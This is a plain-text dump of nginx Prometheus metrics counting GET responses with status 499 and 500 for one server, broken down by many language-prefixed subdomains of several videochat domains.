nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.tv.br"} 711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mn.videochat.world"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.tv.br"} 244 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mr.videochat.world"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.cafe"} 86 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.date"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.tv.br"} 402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mrj.videochat.world"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.tv.br"} 996 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ms.videochat.world"} 355 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.tv.br"} 414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mt.videochat.world"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="mta-sts.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.tv.br"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="my.videochat.world"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.tv.br"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ne.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.tv.br"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="nl.videochat.world"} 306 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.cafe"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.date"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.tv.br"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="no.videochat.world"} 217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.cafe"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.tv.br"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pa.videochat.world"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.tv.br"} 390 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pap.videochat.world"} 243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pkiaram.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.show"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pl.videochat.world"} 402 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.cafe"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.show"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="pt.videochat.world"} 299 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="qshicka.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.tv.br"} 254 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ro.videochat.world"} 260 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ryfusmrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.cafe"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sco.videochat.world"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.date"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.tv.br"} 150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="si.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.tv.br"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sk.videochat.world"} 282 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.date"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.tv.br"} 197 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sl.videochat.world"} 208 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sptlqmk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.cafe"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.date"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.tv.br"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sr.videochat.world"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="staging.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.date"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.tv.br"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="su.videochat.world"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.cafe"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sv.videochat.world"} 298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.date"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.tv.br"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="sw.videochat.world"} 203 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.tv.br"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ta.videochat.world"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.tv.br"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="te.videochat.world"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="test.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.cafe"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.date"} 104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.tv.br"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tg.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.tv.br"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="th.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.cafe"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tl.videochat.world"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tr.videochat.world"} 399 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.date"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.tv.br"} 360 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="tt.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.tv.br"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="udm.videochat.world"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.cafe"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.tv.br"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uk.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.cafe"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.tv.br"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ur.videochat.world"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.tv.br"} 342 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="uz.videochat.world"} 217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.date"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.tv.br"} 139 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vi.videochat.world"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.cafe"} 1752 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.date"} 945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.mx"} 2785 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.show"} 250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.tv.br"} 1500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="videochat.world"} 2287 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="vmi460104.contaboserver.net"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="waqqvxh.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="wngqune.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="www.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.tv.br"} 722 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xh.videochat.world"} 206 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="xicipcrvyobs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ybifrit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.tv.br"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="yi.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="zh.videochat.world"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="af.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="al.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="az.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="bn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="bs.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ceb.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="chm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="cy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="de.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="el.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="en.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="fi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="hi.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="hr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ht.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="it.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="kk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="km.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pap.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="pt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="sk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="sv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="tg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="tt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="uz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="500",vhost="vi.videochat.mx"} 1 